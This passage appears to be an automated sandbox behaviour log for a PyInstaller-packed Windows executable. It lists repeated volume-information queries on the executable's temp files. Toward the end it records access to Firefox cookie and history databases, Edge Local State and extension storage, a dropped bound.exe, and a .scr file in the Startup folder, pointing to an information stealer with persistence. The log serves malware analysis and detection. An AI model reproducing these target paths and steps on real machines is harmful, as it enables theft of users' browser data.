                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\blank.aes VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\blank.aes VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\blank.aes VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\blank.aes VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\blank.aes VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\blank.aes VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\_lzma.pyd VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\_bz2.pyd VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\_sqlite3.pyd VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\_socket.pyd VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\select.pyd VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\_ssl.pyd VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\_hashlib.pyd VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\_queue.pyd VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\bound.blank VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\bound.blank VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bound.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\unicodedata.pyd VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ \System\Antivirus.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.pdf VolumeInformationJump to behavior
